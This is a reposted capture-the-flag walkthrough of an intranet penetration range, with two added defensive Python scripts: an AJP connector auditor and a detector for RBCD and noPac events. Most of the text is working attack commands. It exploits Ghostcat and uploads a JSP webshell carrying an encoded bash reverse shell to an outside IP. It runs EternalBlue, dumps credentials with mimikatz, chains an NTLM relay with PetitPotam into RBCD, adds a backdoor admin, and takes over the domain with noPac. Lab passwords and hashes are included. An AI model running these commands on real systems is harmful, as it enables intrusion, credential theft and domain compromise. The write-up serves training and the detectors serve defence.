[Intranet Penetration] The Most Hand-Holding Chunqiu Yunjing (春秋云镜) Spoofing Range Walkthrough

Contents

flag1

flag2 

flag3 

flag4


flag1

Scanned with fscan

Visit port 8080

Directory scan finds ./docs/

Visiting it shows Tomcat 9.0.30

GitHub - 00theway/Ghostcat-CNVD-2020-10487: Ghostcat read file/code execute,CNVD-2020-10487(CVE-2020-1938)

python ajpShooter.py http://39.99.135.143:8080 8009  /WEB-INF/web.xml read
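From the defender's side, what Ghostcat needs is an AJP connector that is reachable from the network and has no shared secret, which is exactly what the stock server.xml of Tomcat 9.0.30 shipped (AJP on port 8009, bound to all interfaces, no secret). The following Python audit is an added example and is not part of the original writeup or of the Ghostcat tool: it parses a server.xml and flags such connectors. The two server.xml samples are constructed; the hardened one uses the `address`, `secretRequired` and `secret` connector attributes, which assumes Tomcat 9.0.31 or later (on 9.0.30 itself the only fix is to upgrade or to disable the AJP connector).

```python
import xml.etree.ElementTree as ET

# Constructed sample: the shape of the stock Tomcat 9.0.30 server.xml,
# AJP connector enabled on 8009, all interfaces, no shared secret.
VULNERABLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""

# Constructed sample: AJP bound to loopback with a required secret
# (attributes available from Tomcat 9.0.31 on; secret value is a placeholder).
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET" redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""

# Addresses on which an AJP listener is only reachable by local processes.
LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "0:0:0:0:0:0:0:1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return one finding dict per AJP connector found in a server.xml string.

    Each finding carries the connector port, bind address and a list of
    weaknesses; an empty list means the connector looks acceptably configured.
    """
    findings = []
    root = ET.fromstring(server_xml)
    for connector in root.iter("Connector"):
        # Tomcat defaults the protocol attribute to HTTP/1.1 when absent.
        protocol = connector.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue
        issues = []
        address = connector.get("address")
        # No address attribute means "listen on every interface".
        if address is None or address not in LOOPBACK_ADDRESSES:
            issues.append("ajp-listens-on-non-loopback")
        secret = connector.get("secret", "")
        secret_required = connector.get("secretRequired", "true").lower() == "true"
        # Either no secret configured or secret checking switched off.
        if not secret or not secret_required:
            issues.append("ajp-no-secret")
        findings.append({"port": connector.get("port"), "address": address, "issues": issues})
    return findings


def is_ajp_exposed(server_xml):
    """True if any AJP connector in the config has at least one weakness."""
    return any(finding["issues"] for finding in audit_ajp_connectors(server_xml))


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(cfg):
            print(label, finding)
```

The check deliberately treats a missing `address` as a finding rather than reading Tomcat's version-dependent default, so the same script gives a useful answer for a 9.0.30 file and for a newer one.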

web.xml reveals a file upload route

Visit ./UploadServlet

Upload the malicious file

<%
    java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
%>

python ajpShooter.py http://39.99.135.143:8080 8009 /upload/356aefc49ff23dd7de8998158421d8e2/20241016105901376.txt eval

Reverse shell received

Read flag1

cat /root/flag/flag01.txt

flag2

Download fscan and frp with wget, set up a proxy and scan the internal network

Results:

  • 172.22.11.76 already compromised
  • 172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010
  • 172.22.11.26 XIAORANG\XR-LCM3AE8B
  • 172.22.11.6 XIAORANG\XIAORANG-DC

Hit EternalBlue first

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload  payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
run

Got a shell

cat C:/users/administrator/flag/flag02.txt

flag3 

Dump the machine account hash and yangmei's hash

load kiwi
creds_all

proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav 2>/dev/null

.26 has the WebClient service running

Get a new reverse shell from the Tomcat box

Run:

socat tcp-listen:80,reuseaddr,fork tcp:124.222.136.33:8848

On the VPS run:

./frps -c ./frps.ini

[common]
bind_port = 7099

[tcp_1200]
type = tcp
local_ip = 127.0.0.1 
local_port = 8848

On the local Kali box run:

./frpc -c ./frpc.ini

[common]
server_addr = vpsip
server_port = 7099

[plugin_socks6]
type = tcp
remote_port = 8848
local_port = 80
local_ip = 127.0.0.1

A curl confirms the request really does arrive at the local Kali box

Start ntlmrelayx, using the previously compromised XR-Desktop as the attacker-controlled machine account for RBCD, then use PetitPotam to coerce XR-LCM3AE8B into authenticating to 172.22.11.76

proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
proxychains python PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26

Use the XR-DESKTOP$ machine account hash dumped earlier on 172.22.11.45 to exploit RBCD against 172.22.11.26 and request a service ticket (ST)

proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :1feeaf9a8e1e24a26e80c401c990b325  xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

Import the ticket

export KRB5CCNAME=administrator.ccache

Add 172.22.11.26 XIAORANG\XR-LCM3AE8B to /etc/hosts, then connect with psexec using the ticket, no password needed

proxychains python psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk

Read flag3

type C:\users\administrator\flag\flag03.txt

flag4

Found an MA_Admin group, which is allowed to add accounts

Add a local administrator

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

RDP into 172.22.11.26

Upload mimikatz

Run as administrator:

privilege::debug
sekurlsa::logonpasswords

Dumped the hash of user zhanghui, 1232126b24cdf8c9bd2f788a9d7c7ed1. This user is in the MA_Admin group, which can create objects under the Computers container, i.e. add machine accounts to the domain, so noPac is viable

Run noPac (GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user)

proxychains python noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell

Read flag4

type C:\users\administrator\flag\flag04.txt
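Both the RBCD write from the flag3 section and the noPac account rename in this section leave distinctive traces in the domain controller's Security log. The detector below is an added example, not part of the original writeup or of the tools it uses: it runs over constructed event records shaped like flattened Windows Security events and raises on (a) Event 5136 writes to msDS-AllowedToActOnBehalfOfOtherIdentity, which requires the Directory Service Changes audit subcategory plus a SACL on computer objects, with a self-write by a computer account marked as the relay pattern, and (b) a 4741 computer creation followed by a 4781 rename that drops the trailing `$`, optionally colliding with a DC name. The field names follow the Windows event schema; the sample events, the DESKTOP-Q1W2E3 and FILESRV01 names and the DC_HOSTNAMES set are constructed and assumed.

```python
# Constructed sample events, modelled on Windows Security log fields; not real
# telemetry from the range. Each dict is one flattened event record.
DC_HOSTNAMES = {"XIAORANG-DC"}  # assumed: DC computer account is XIAORANG-DC$

EVENTS = [
    # 4741: a standard user creates a computer account (machine account quota).
    {"EventID": 4741, "SubjectUserName": "zhanghui",
     "TargetUserName": "DESKTOP-Q1W2E3$", "TargetDomainName": "XIAORANG"},
    # 4781: the fresh computer is renamed to the DC's name without the '$'.
    {"EventID": 4781, "SubjectUserName": "zhanghui",
     "OldTargetUserName": "DESKTOP-Q1W2E3$", "NewTargetUserName": "XIAORANG-DC"},
    # 4781: renamed back afterwards; old name has no '$', so this is not the pattern.
    {"EventID": 4781, "SubjectUserName": "zhanghui",
     "OldTargetUserName": "XIAORANG-DC", "NewTargetUserName": "DESKTOP-Q1W2E3$"},
    # 5136: a computer account writes its own RBCD attribute, the shape an LDAP
    # relay of that computer's authentication produces.
    {"EventID": 5136, "SubjectUserName": "XR-LCM3AE8B$",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    # 5136: benign attribute change by an admin; must not alert.
    {"EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=FILESRV01,CN=Computers,DC=xiaorang,DC=lab", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

RBCD_ATTRIBUTE = "msds-allowedtoactonbehalfofotheridentity"


def _leading_cn(object_dn):
    """'CN=HOST,CN=Computers,DC=x' -> 'HOST'."""
    return object_dn.split(",", 1)[0].split("=", 1)[1]


def detect_rbcd_write(events):
    """Alert on every 5136 that touches msDS-AllowedToActOnBehalfOfOtherIdentity.

    self_write is True when the writing principal is the computer account of
    the object being modified, which is what a relayed machine authentication
    looks like; legitimate admin configuration is done by a different subject.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != RBCD_ATTRIBUTE:
            continue
        target = _leading_cn(ev["ObjectDN"])
        subject = ev["SubjectUserName"]
        alerts.append({
            "rule": "rbcd-attribute-written",
            "target": target,
            "subject": subject,
            "self_write": subject.rstrip("$").lower() == target.lower(),
        })
    return alerts


def detect_nopac(events, dc_hostnames):
    """Alert on a computer account rename that drops the trailing '$'.

    Correlates 4781 with earlier 4741 creations in the same stream and flags
    whether the new name collides with a known domain controller name.
    """
    created_by = {}  # lower-cased sAMAccountName -> creating subject
    dc_names = {name.lower() for name in dc_hostnames}
    alerts = []
    for ev in events:
        if ev.get("EventID") == 4741:
            created_by[ev["TargetUserName"].lower()] = ev["SubjectUserName"]
        elif ev.get("EventID") == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if old.endswith("$") and not new.endswith("$"):
                alerts.append({
                    "rule": "computer-renamed-without-dollar",
                    "account": old,
                    "new_name": new,
                    "subject": ev["SubjectUserName"],
                    "recently_created": old.lower() in created_by,
                    "collides_with_dc": new.lower() in dc_names,
                })
    return alerts


def run_detections(events, dc_hostnames=DC_HOSTNAMES):
    """Run both rules over one event stream and return all alerts."""
    return detect_rbcd_write(events) + detect_nopac(events, dc_hostnames)


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(alert)
```

On the range the benign baseline would be near zero for both rules: computer accounts are rarely renamed to names without `$`, and msDS-AllowedToActOnBehalfOfOtherIdentity is normally written only during deliberate delegation setup by an administrator, never by the computer itself.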

 

Reposted from blog.csdn.net/uuzeray/article/details/142993560